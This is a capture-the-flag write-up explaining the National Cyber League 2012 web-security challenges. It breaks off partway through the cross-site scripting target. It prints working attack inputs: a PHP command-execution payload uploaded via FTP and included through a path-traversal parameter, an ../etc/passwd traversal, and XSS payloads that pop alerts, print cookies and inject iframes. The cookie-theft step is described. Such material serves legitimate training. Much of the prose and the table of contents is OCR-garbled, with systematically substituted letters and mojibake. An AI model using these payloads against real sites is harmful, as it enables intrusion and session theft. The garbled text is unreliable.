National Cyber Leauge 2012 Challenge Explanations

Foi Public Release
Copyright 2012 iSIGHT Partners

SM
- All Rights Reserved

Challenge Explanations
National Cybei League
Fall 2u12

I. Introduct|on

The 2u12 pilot season of the National Cybei League pioviueu collegiate
paiticipants with a uigital tiaining giounu to uevelop, uemonstiate, anu test
theii cybei secuiity skills in a ieal-woilu, fast-paceu enviionment.
Culminating with an inuiviuual "Captuie The Flag" exeicise uevelopeu anu
ueliveieu iemotely by ThieatSPACE
TN
, a uivision of SIuBT Paitneis
SN
.

The inuiviuual cybei secuiity competition was iun simultaneously in thiee
nationally geogiaphic iegions: Eastein, Niu-West, anu Westein. Within each
of these iegions thiee competing iounus weie ueliveieu. The fiist focuseu on
Web Application Secuiity anu Exploitation, the seconu iounu centeieu
aiounu Log Analysis anu Inciuent Response, anu the thiiu anu final 'iegulai
season' iounu encompasseu a laige iange of ciyptogiaphy ielateu challenges.

At the conclusion of all thiee iegulai season iounus, the top ten (1u)
paiticipants fiom each iegion weie inviteu to compete in a National Final.
The finalist woulu be pioviueu access to all pieviously unsolveu challenges
as well as a few new puzzles to evenly uistiibute points acioss all thiee high-
level pioficiencies.

Foi Public Release

SM
- All Rights Reserved 2
!"#$% '( )'*+%*+,
I. Introduct|on ........................................................................................................... 1
II. kound Cne - Web Secur|ty ..................................................................................... 4
A. Flags ........................................................................................................................................................................ 4
B. The Secuie Socket Layei 0iganizational 0nit (SSL 00) .................................................................. S
C. Taiget 0ne - Local File Inclusion ............................................................................................................... 6
B. Taiget Two - }avaSciipt 0bfuscation .................................................................................................... 1u
E. Taiget Thiee - Seivice Exploitation ...................................................................................................... 1S
F. Taiget Foui - Cioss-Site Sciipting .......................................................................................................... 18
!" #$%& ()* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +,
+" #$%& -./ """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +,
0" #$%& -12** """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +!
3" #$%& #/42 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +!
5" #$%& #67* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +0
u. Taiget Five - Commanu Injection ........................................................................................................... 2S
!" #$%& ()* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +8
+" #$%& -./ """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +9
0" #$%& -12** """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +:
3" #$%& #/42 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +;
5" #$%& #67* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" +;
B. Taiget Six - SQL Injection .......................................................................................................................... S1
III. kound 1wo - Log Ana|ys|s .................................................................................... 34
A. Scenaiio .............................................................................................................................................................. S4
B. Flags ..................................................................................................................................................................... SS
C. Winuows Secuiity Log ................................................................................................................................. S8
B. Coiiupt Winuows Secuiity Log ............................................................................................................... S8
E. Linux Authentication Log ........................................................................................................................... 4u
F. Coiiupt Linux Authentication Log .......................................................................................................... 41
u. Apache Log ........................................................................................................................................................ 42
B. Netwoik Bata Captuie ................................................................................................................................. 4S
IV. kound 1hree - Cryptography ................................................................................ 4S
A. Scenaiio .............................................................................................................................................................. 4S
B. Flags ..................................................................................................................................................................... 46
C. Linux Passwoius ............................................................................................................................................. 48
!" <%=16)& >$&/26?1@= """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 3:
+" A2%BC*D E%==./2D= """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 3;
B. Winuows Passwoius .................................................................................................................................... Su
E. Basic Ciyptogiaphy ....................................................................................................................................... S1
!" A1%$$*)&* ()* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5!
+" A1%$$*)&* -./ """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5!
0" A1%$$*)&* -12** """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5!
3" A1%$$*)&* #/42 """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5+
5" A1%$$*)&* #67* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5+
8" A1%$$*)&* F6G """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 50
9" A1%$$*)&* F*7*) """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 50
:" A1%$$*)&* H6&1? """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 53
;" A1%$$*)&* I6)* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 53
Foi Public Release

SM
- All Rights Reserved S
!," A1%$$*)&* -*) """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 55
F. Auvanceu Ciyptogiaphy .............................................................................................................................. S6
!" E4JJ$*= ()*K -./K %)D -12** """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 58
+" E4JJ$*= #/42 %)D #67* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 58
u. Steganogiaphy ................................................................................................................................................ S7
!" #62=? E4JJ$* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 59
+" F*B/)D E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 59
0" -162D E4JJ$* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5:
3" #/42?1 E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5;
5" #6L?1 E4JJ$* """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 5;
8" F6G?1 E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 8,
9" F*7*)?1 E4JJ$* """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 8!
V. NCL Champ|onsh|p ............................................................................................... 6S
A. Flags ..................................................................................................................................................................... 6S
B. Netwoik Bata Analysis ................................................................................................................................ 66
C. Web Exploitation - Taiget Thiee ............................................................................................................ 67

Foi Public Release

SM
II. kound Cne - Web Secur|ty

In the fiist iounu contestants weie to locate twenty-one (21) flags, founu
acioss six (6) taigets. Each taiget was home to a uiffeient web application
which focuseu on a specific Web Exploitation skill.
A. I|ags
Name Server

What is the SSL OU at this address? 54.243.141.68 (Target 1)
What is the flag value in this web app? 54.243.141.68 (Target 1)
What is the flag value in this web app? 54.243.157.198 (Target 2)
Which glibc function is being used insecurely in the binary? 54.243.157.201 (Target 3)
What is flag one at this address? 54.243.157.202 (Target 4)
What is flag two at this address? 54.243.157.202 (Target 4)
What is flag three at this address? 54.243.157.202 (Target 4)
What is flag four at this address? 54.243.157.202 (Target 4)
What is flag five at this address? 54.243.157.202 (Target 4)
What is flag one at this address? 54.243.157.208 (Target 5)
What is flag two at this address? 54.243.157.208 (Target 5)
What is flag three at this address? 54.243.157.208 (Target 5)
What is flag four at this address? 54.243.157.208 (Target 5)
What is flag five at this address? 54.243.157.208 (Target 5)
What is the password for jsmith at this address? 54.242.95.129 (Target 6)
What is the item with ID #6 at this address? 54.242.95.129 (Target 6)
Foi Public Release

SM
- All Rights Reserved S
8. 1he Secure Socket Layer Crgan|zat|ona| Un|t (SSL CU)

Each taiget was accessible ovei BTTPS; as such each taiget hau a
unique Secuie Socket Layei (SSL) ceitificate. Within each taiget's
ceitificate theie was a flag, founu within the oiganizational unit (00)
fielu.

The playei was able to obtain this flag uiiectly thiough the web
biowsei, by ieviewing the ceitificate uetails. In fact, because each
ceitificate was self-signeu, most biowseis woulu fiist piompt the usei
to ieview the ceitificate anu ultimately accept it. Regaiuless of the
methou, once the ceitificate infoimation was uisplayeu, the flag coulu
be ietiieveu fiom the 00 fielu.

Foi Public Release

SM
C. 1arget Cne - Loca| I||e Inc|us|on

The fiist taiget the playeis woulu encountei uisplayeu nothing moie
than a clown, a uiopuown list (containing a list of colois), anu a
button labeleu "Change Backgiounu".

0pon selecting a coloi, the contestant shoulu notice two ielevant
items. Fiist the backgiounu cleaily changes to the specifieu coloi, anu
seconuly the 0RL changes to incluue a 'backgiounu' paiametei.
Foi Public Release

SM
This paiametei happens to match the submitteu selection fiom the
uiopuown.

https://target-one/?background=Green

It is at this point that the paiticipant will hopefully begin manipulating
the paiametei's value via the 0RL. 0ne impoitant clue is that any
invaliu entiy sets the backgiounu to white, but uoes not piouuce an
eiioi.

https://target-one/?background=FooBar

https://target-one/?background=Black

Coming to the conclusion that only the colois in the list woikeu, one
may look foi items at the ioot of the web seivice, nameu that of the
valiu colois.

https://target-one/Blue

This woulu iesult in a page containing only the coloi specifieu.
Fuithei moie the souice of saiu page woulu ieveal the following
BTNL, exclusively.

<body bgcolor=!blue!>

At this point one might concluue that the file being passeu in via the
"backgiounu" paiametei is simply being incluueu uiiectly in the base
PBP page.

The cuiious woulu now scan the taiget anu notice that in auuition to
TCP Poit 8u (BTTP), TCP Poit 21 (FTP) was open. Connecting to this
poit woulu ieveal an FTP seivice, which alloweu anonymous login.

220 (vsFTPd 2.3.5)
530 Please login with USER and PASS.
Name (target-one:player): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Foi Public Release

SM
Aftei a simple peimission test, the playei woulu leain they have ieau
anu wiite access to this FTP seivice. Knowing the system is iunning a
Linux uistiibution (obtainable via the pieviously completeu scan) anu
the vsFTPu seivice (founu in the FTP welcome message), the
contestant shoulu know they aie within the M=27ML?NM4N$/%D=
uiiectoiy.

With all of the pieviously gaineu infoimation access to the flag is
ielatively easy: the playei can uploau a PBP Sciipt to the FTP seivice,
anu then locally incluue it via the "backgiounu" 0RL paiametei.

https://target-one/?background=../../../srv/ftp/uploads/a.php

0nfoitunately this inclusion will not woik. Fuithei testing will ieveal
that the inclusion is appenuing ".html" to the enu of the incluueu file.
Theiefoie the uploaueu file must enu in ".html" as well.

0ploauing something like the following to a file enuing in ".html" anu
incluuing it woulu ieveal the uiiectoiy listing within the web seivices
woiking uiiectoiy.

<?php print "<pre>!; system(#ls $la%); print "</pre>!; ?>

total 60
-rwxr-xr-x 1 root root 128 Oct 12 14:27
drwxr-xr-x 2 root root 4096 Oct 12 17:28 .
drwxr-xr-x 13 root root 4096 Dec 1 22:00 ..
-rwxr-xr-x 1 root root 22 Oct 12 14:27 Blue.html
-rwxr-xr-x 1 root root 23 Oct 12 14:27 Green.html
-rwxr-xr-x 1 root root 21 Oct 12 14:27 Red.html
-rwxr-xr-x 1 root root 24 Oct 12 14:27 White.html
-rwxr-xr-x 1 root root 24 Oct 12 14:27 Yellow.html
-rwxr-xr-x 1 root root 21913 Oct 12 14:27 clown.jpg
-rwxr-xr-x 1 root root 1292 Oct 12 14:27 index.php

Inspection of the uiiectoiy listing woulu show that theie is a file with
a name containing blank, oi non-piintable, chaiacteis.
Foi Public Release

SM
<?php
foreach (scandir(".") as $file)
print "<pre>". rawurlencode($file) . "</pre><br>";
?>

https://target-one/?background=../../../srv/ftp/uploads/b.php

The execution of the above coue woulu have each file 0RL-encoueu
anu then piinteu to the page on its own line. This woulu ieveal that
the pieviously uiscoveieu file is nameu with foui spaces. Simply
piinting the file contents, which can be uone thiough the web
biowsei, will get the paiticipant to the next step.

https://target-one/%20%20%20%20

The file contains some infoimation explaining that it, in-anu-of-itself,
is not the flag, but the NBS of the piopei stiing is the flag.

This is not the flag, but if you can figure out what it is, get its MD5 and
you win!!!

TXlJZGVudGl0eU11c3RBbHdheXNCZVNlY3JldA==

The stiing following the text is BASE64 encoueu; uecouing the stiing
ietuins a new stiing.

MyIdentityMustAlwaysBeSecret

Simply taking the above stiing, anu obtaining its NBS is the solution.

19b405425c0d5b506dcfc77caa5b6d68

Foi Public Release

SM
- All Rights Reserved 1u
D. 1arget 1wo - IavaScr|pt Cbfuscat|on

The seconu taiget the playeis will encountei piesents them with yet
anothei clown, this time accompanieu by a text entiy box anu a
Submit button.
Foi Public Release

SM

Enteiing text into the text box anu submitting it woulu peifoim a uET
iequest to the page, with the enteieu text as the value foi a paiametei
labeleu "68aueu8964cuf7SuS4Sc47SS4bSfS772".

https://target-two/?68ade08964cdf750343c47354b3f5772=test

At this point ieview of the souice coue will ieveal obfuscateu
}avaSciipt. The }avaSciipt is obfuscateu using a publically available
tool founu at:

http://www.javascriptobfuscator.com/Javascript-Obfuscator.aspx

The obfuscation is simple to follow; all of the stiings anu function
names aie hexauecimally encoueu anu stoieu in the fiist aiiay. Next
all vaiiables aie ienameu to a nonsensical stiing of numbeis.

Theie aie numeious iesouices publically available to assist in the
piocess of ue-obfuscation. Theie aie two main tasks one shoulu
complete: iefoimatting the coue foi bettei ieauability anu uecouing
any encoueu uata (such as the functions anu stiings in this puzzle). A
gieat public iesouice capable of uoing both of these tasks can be
founu at:

http://jsbeautifier.org/

Aftei the paiticipant has obtaineu a moie ieauable copy of the
}avaSciipt, they shoulu notice that the O,G!+#!GA }avaSciipt function
is being executeu when uata is submitteu thiough the BTNL foim.

<input type="button" name="Submit" value="Submit"
onClick="_0x12F1xC(this.form)">

The playei shoulu now peifoim some basic ue-obfuscation that woulu
show that the initial }avaSciipt function is acting as a Substitution
Ciphei between the two chaiactei lists uecoueu fiom the initial Aiiay.

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%@#$^&*()-
_=+.:
zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA+=_-
)(*&^$#@:.

Foi Public Release

SM
Next, the initial }avaSciipt function passes the input fiom the foim
onto the }avaSciipt function labeleu O,G+8P!GA. This function,
amongst othei things, compaies the value passeu in against a value
stoieu in the initial aiiay.

if (_0x31F1xC == _0x55cd[11]) {
_0x2EF1xC(_0x31F1xC);
} else {
_0x2EF1xC(_0x55cd[12]);
};

The value of O,G55BDQ!!R is alieauy known fiom the initial uecouing
the playei peifoimeu on the Aiiay.

_0x55cd[11] = zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC

0sing a bit of }avaSciipt uebugging with eithei Fiiebug (Fiiefox) oi
the Bevelopei Console (Chiome) the playei coulu obtain the
conveiteu stiing as well as the mouulus value that O,G!+#!GA is
passing to the next function.

var _0x1203x5 = "zYeoXkNtsUgcFuwSrNijBqAZyXvKnPZYfIVErC";
_0x1211xC = _0x1203x5;
var _0x1203x6 = _0x55cd[3];
var _0x1203x7 = _0x55cd[4];
var _0x1203x8 = _0x55cd[0];
var _0x1203x9 = 0;
var _0x1203xa = 1;
while (_0x1203x9 != _0x1203x5[_0x55cd[5]]) {
_0x1203x8 +=
_0x1203x7[_0x55cd[8]](_0x1203x6[_0x55cd[7]](_0x1203x5[_0x55cd[6]
](_0x1203x9, _0x1203xa)));
_0x1203x9++;
_0x1203xa++;
};
var _0x1203xb = _0x1203x5[_0x55cd[5]] % 9;
if (_0x1203xb == 0) {
_0x1203xb = 3;
};
console.log(_0x1203x8);
console.log(_0x1203xb);

We now have the piopei values to pass into the seconu }avaSciipt
function ,G+8P!GA.

aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX
2
Foi Public Release

SM
- All Rights Reserved 1S
Submitting the pieviously obtaineu stiing uoes not change the page's
output oi souice coue. So it shoulu be cleai to the playei that
O,G+8P!GA uoes something else to the input (fiom the foim). A bit
moie }avaSciipt uebugging anu the paiticipant will uiscovei that
O,G+8P!GA is shifting the chaiacteis like a Caesai Ciphei.

_0x1203xd = "aBvlCpMghFtxUfdHiMrqYjZAbCePmKABuREViX";
_0x1203xb = 2;
_0x2DD1xC = _0x55cd[9];
_0x2EE1xC = _0x55cd[10];
_0x68E7xC = _0x55cd[0];
_0x31F1xC = _0x55cd[0];
_0x1203xb = eval(_0x1203xb);
for (i = 0; i < _0x1203xd[_0x55cd[5]]; i++) {
let = _0x1203xd[_0x55cd[8]](i);
pos = _0x2EE1xC[_0x55cd[7]](let);
if (pos >= 0) {
_0x68E7xC += _0x2EE1xC[_0x55cd[8]]((pos +
_0x1203xb) % 26);
} else {
_0x68E7xC += let;
};
};
for (i = 0; i < _0x68E7xC[_0x55cd[5]]; i++) {
let = _0x68E7xC[_0x55cd[8]](i);
pos = _0x2DD1xC[_0x55cd[7]](let);
if (pos >= 0) {
_0x31F1xC += _0x2DD1xC[_0x55cd[8]]((pos +
_0x1203xb) % 26);
} else {
_0x31F1xC += let;
};
};
console.log(_0x31F1xC);

The above coue will ieveal the piopeily encoueu veision of the stiing.

cDxnErOijHvzWhfJkOtsAlBCdEgRoMCDwTGXkZ

When the playei enteis the above stiing in the input box anu submits
the foim something uiffeient happens. Insteau of setting the inputteu
value to the paiametei labeleu
"68aueu8964cuf7SuS4Sc47SS4bSfS772" it sets a uiffeient paiametei,
SeSfSbSSa2Saf6uaf1ef8eSScS9S681f.

https://target-
two/?5e3f5b33a23af6daf1ef8e35c393681f=cDxnErOijHvzWhfJkOtsAlBCdEg
RoMCDwTGXkZ

Foi Public Release

SM
In auuition to the playei now leaining of this new vaiiable, the page
uisplays a message:

This is not the flag! We have successfully wasted your time for the
LULZ!!!!!
TROLL 1 : 0 YOU

At this point the playei shoulu manipulate the new paiametei to
uiscovei that it piesents a Local File Inclusion vulneiability.

https://target-
two/?5e3f5b33a23af6daf1ef8e35c393681f=../../../etc/passwd

As this taiget piesents no way to intiouuce new oi auuitional coue,
the solution must be piesent within the alieauy existing coue.
Incluuing the 'inuex.php' file will ieveal the actual PBP coue.

https://target-two/?5e3f5b33a23af6daf1ef8e35c393681f=index.php

$_F=__FILE__;$_X='Pz48P3BocA0KDQoJZjNuY3Q0Mm4gYzNzdDJtRXJyMnIoJ
DVycm4yLCAkNXJyc3RyKQ0KICAgICAgICB7DQoNCgkJcjV0M3JuIDA7DQogICA
gICAgIH0NCg0KCQkkNG5mMiA9ICRfR0VUWydpNW9maWJvbzFhbzFmZWQxZjY
1Zjg1b2ljbzlvZTg2ZiddOw0KCQk0ZiAoICQ0bmYyID09ICJNMXJjM3NNMm5nMkY
xd2s1c0lzRDFNMW5XNHRoRDFTNWNyNXRXNTFwMm4iICl7DQogICAgICAgICAgI
CAgICAgICAgICAgICA1Y2gyICI8YzVudDVyPjxmMm50IGMybDJyPVwiV2g0dDVc
Ij48aDY+QzJuZ3IxdHohIFkyMyBiNTF0IHRoNSBUcjJsbCEhIDxiciAvPiBUaDUgZmw
xZyA0czogIjsgIDVjaDIgbWRpKCJEdzRnaHRJelIyeHhTdDFyIik7IDVjaDIgIjwvZjJud
D48L2g2PjwvYzVudDVyPiI7fQ0KCQkJczV0XzVycjJyX2gxbmRsNXIoImMzc3Qy
bUVycjJyIik7DQoJIAkJNWNoMiBmNGw1X2c1dF9jMm50NW50cygkNG5mMik7D
QoNCj8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g
9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZW
dfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRf
Uj0wOyRfWD0wOw=='));?

The PBP coue is obfuscateu. Two uistinct sections of the coue aie
cleaily encoueu using BASE64. Becouing the fiist PBP vaiiable will
uncovei a new set of PBP instiuctions.

f3nct42n c3st2mErr2r($5rrn2, $5rrstr) {
r5t3rn 0;
}
$4nf2 = $_GET['i5ofiboo1ao1fed1f65f85oico9oe86f'];
4f ( $4nf2 == "M1rc3sM2ng2F1wk5sIsD1M1nW4thD1S5cr5tW51p2n" ){
5ch2 "<c5nt5r><f2nt c2l2r=\"Wh4t5\"><h6>C2ngr1tz! Y23 b51t
th5 Tr2ll!! <br /> Th5 fl1g 4s: "; 5ch2 mdi("Dw4ghtIzR2xxSt1r"); 5ch2
"</f2nt></h6></c5nt5r>";}
s5t_5rr2r_h1ndl5r("c3st2mErr2r");
5ch2 f4l5_g5t_c2nt5nts($4nf2);

Foi Public Release

SM
While this coue looks paitially ieauable, anu some of its contents will
be familiai to the playei, its still paitially obfuscateu. The seconu
poition of the oiiginal PBP coue neeus to be ue-obfuscateu to uncovei
the key to ue-obfuscate this new coue.

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_
R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0

This seconu section of coue cleaily ieplaces the vowels of the pievious
coue block. Reveising this shoulu ieveal the following:

function customError($errno, $errstr)
{
return 0;
}
$info = $_GET['5e3f5b33a23af6daf1ef8e35c393681f'];
if ( $info == "MarcusMongoFawkesIsDaManWithDaSecretWeapon" ){
echo "<center><font color=\"White\"><h1>Congratz! You beat the
Troll!! <br /> The flag is: "; echo md5("DwightIzRoxxStar"); echo
"</font></h1></center>";}
set_error_handler("customError");
echo file_get_contents($info);

As the playei shoulu now iealize, passing in
"NaicusNongoFawkesIsBaNanWithBaSecietWeapon" to the
paiametei labeleu "'SeSfSbSSa2Saf6uaf1ef8eSScS9S681f'" will
ietuin the flag.

https://target-
two/?5e3f5b33a23af6daf1ef8e35c393681f=MarcusMongoFawkesIsDaManWi
thDaSecretWeapon

Congratz! You beat the Troll!!
The flag is: 1290c8ae9f867dde48f16044b9e18bc1

L. 1arget 1hree - Serv|ce Lxp|o|tat|on

The thiiu challenge pioviueu the playei with nothing moie than a
uownloau link. The flag asks which glibc function was being
insecuiely useu in the binaiy. Examining the binaiy woulu ieveal that
it was a Linux ELF Binaiy.

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.6.15, stripped

Fuithei ieview woulu leau the playei to the fact that this binaiy
woulu noimally be iunning on a seivei with a flag file anu a key file.
The binaiy woulu then take the key file as input fiom the enu-usei
Foi Public Release

SM
anu upon ieceiving the piopei key, ietuin the flag. In this exeicise
howevei, the goal is to simply finu the vulneiable function call, anu
not to weaponize an exploit against the seivice.

A quick listing of the function calls fiom the binaiy will pioviue some
piospective canuiuates foi the vulneiable function call.

strcpy
readdir
sprintf
fopen
strncmp
perror
closedir
stdin
fgets
strlen
memset
getchar
memcpy
fclose
malloc
strcat
opendir
readlink
write
free

At this point the contestant shoulu be able to naiiow the list uown to
the commonly misuseu functions, iesulting in a much smallei
instiuction set to ieveise engineei.

strcpy
memset
getchar
memcpy
malloc
strcat
write

Now the paiticipant shoulu step thiough the piogiam execution in a
uebuggei, like IBA Pio, oi the uN0 Bebuggei, paying paiticulai
attention to the glibc function calls listeu above.

uiven the fact that ieaulink uoesn't N0LL teiminate stiings, anu that
malloc is calleu twice, followeu by a spiintf call, we can see that
sensitive memoiy woulu be leakeu in the :,3:SH# subioutine.

So @%$$/B woulu be the piopei answei to the flag question.

Foi Public Release

SM

Foi Public Release

SM
I. 1arget Iour - Cross-S|te Scr|pt|ng

The fouith web exploitation puzzle pioviues the playei with a Seaich
Poital foi "Teu's Reseaich Piojects." The page contains a simple text
box anu "Seaich" button. The flag list inuicates theie aie five (S) flags
foi this challenge.

Enteiing text anu submitting it will iesult in a iequest which assigns
the "seaich" paiametei with the value enteieu by the usei. In
auuition "iesults" will show in the centei of the scieen.

https://target-four/?search=test&submit=Search

No Result Found For: test

0ne auuitional element that appeais on the page is a link titleu
"Seaich Peimalink." A peimalink is a unique 0RL that will
peimanently ietuin a usei to a given uynamic page. 0ften founu on
seaich ielateu pages, allowing a usei to save the iesults foi latei oi
shaie them with otheis.

Clicking on the Peimalink will biing the playei to an iuentical page,
content-wise, but the 0RL paiameteis have changeu.

https://target-four/?perma=dGVzdA==

The playei will likely notice that the value of the "peima" is BASE64
encoueu:

echo "dGVzdA==" | base64 -d
test

Foi Public Release

SM
Enteiing moie common English teims, such as "the" will actually
ietuin ielevant iesults.

https://target-four/?search=the&submit=Search

0ne item the playei shoulu notice is the piesence of theii seaich teim
on the page. If the input is not being piopeily sanitizeu this is a cleai
inuication of a cioss-site sciipting vulneiability.

A quick test will ieveal that the input is not being piopeily sanitizeu.

https://target-four/?search=<blink>test<%2Fblink>&submit=Search
Foi Public Release

SM
Now that the playei has a uecent unueistanuing of the piopei
woikingsusage of the inteiface anu an iuea of the vulneiability they
shoulu look at the page souice. In uoing so the playei will uncovei a
list of flag hints within a set of BTNL comments.

<!-- There are five flags on this XSS vulnerable page --!>
<!-- Flag 1: Cause an alert box to popup via a permalinked search URL --!>
<!-- Flag 2: Print your cookie to screen via a permalinked search URL --!>
<!-- Flag 3: Insert an iframe (linking to a third party) on the page via a
permalinked search URL --!>
<!-- Flag 4: Send your cookie to a third party server via a permalinked
search URL --!>
<!-- Flag 5: Change the page heading to read "flag5" (no qoutes) via a
permalinked search URL --!>

The iequiiement is to exploit a cioss-site sciipting vulneiability,
peifoiming a specific action, anu saving the link via the Peimalink
0RL. This allows the exploitation to be fiist testeu, anu then "saveu"
via the peimalink to ietiieve the flag value.
1. I|ag Cne

The fiist task is ielatively easy; the paiticipant simply neeus to
popup a }avaSciipt aleit box. As the seaich box is using a
simple uET iequest, the playei can eithei entei theii sciipts
into the Seaich box, oi they can manipulate the 0RL
paiameteis uiiectly.

The following 0RL will cause an aleit with the contents of
"test."

https://target-
four/?search=<script>alert('test');</script>&submit=Search

At this point clicking on the "Seaich Peimalink" link will ietuin
the fiist flag.

1st Flag Is: NCL-ERYT-5346
2. I|ag 1wo

The seconu flag iequiies the cookie to be wiitten to the scieen.
0ne of the simplest }avaSciipt functions is the D/B4@*)?".26?*
function. The D/B4@*)?".26?* function allows text, coue, oi
vaiiables to be piinteu uiiectly to the page. The following 0RL
will piesent the cookie in the uocument wheie the seaich teim
is uisplayeu.

Foi Public Release

SM
https://target-
four/?search=<script>document.write(document.cookie);</script>&s
ubmit=Search

ted_search=beridian+dynamics

A quick click on the "Seaich Peimalink" will ietuin the seconu
flag.

2nd Flag Is: NCL-UYSZ-4578
3. I|ag 1hree

The thiiu flag foi this challenge iequiies an 6L2%@* to be auueu to the
page, linking to a thiiu-paity site. Again, the playei can use the
D/B4@*)?".26?* function to manipulate the page contents. This time
the contestant will neeu to wiite out the BTNL coue foi an 6L2%@*.

https://target-
four/?search=<script>document.write('<iframe%20src="http://www.google.c
om">');</script>&submit=Search

Again, the playei will neeu to click the "Seaich Peimalink" link to get
the flag.

3rd Flag Is: NCL-LJSH-8943

4. I|ag Iour

The fouith flag incieases the complexity of the Peimalink
poition. Foi this flag the paiticipant neeus to ieuiiect the
biowsei to a new location with the cookie as a paiametei. This
is a common exploitation of a cioss-site sciipting vulneiability,
iesulting in the attackei obtaining access to youi authenticateu
account.

The following 0RL will piopeily senu the cookie to a thiiu-
paity, but it will also ieuiiect the biowsei to a new page,
making it uifficult to click the "Seaich Peimalink" link.
Bowevei, the coiiect value must be submitteu as a Peimalink
in oiuei to obtain the flag value.

At this point the playei must go back thiough the pievious
challenges to unueistanu how the Peimalink is geneiateu. So
fai the only fact known is that the seaicheu value is BASE64
encoueu. If the playei takes a look at the thiiu-flag Peimalink,
Foi Public Release

SM
they will uiscovei that moie than simple BASE64 encouing is
taking place.

https://target-
four/?perma=Jmx0O3NjcmlwdCZndDtkb2N1bWVudC53cml0ZSgnJmx
0O2lmcmFtZSBzcmM9JnF1b3Q7aHR0cDovL3d3dy5nb29nbGUuY29tJ
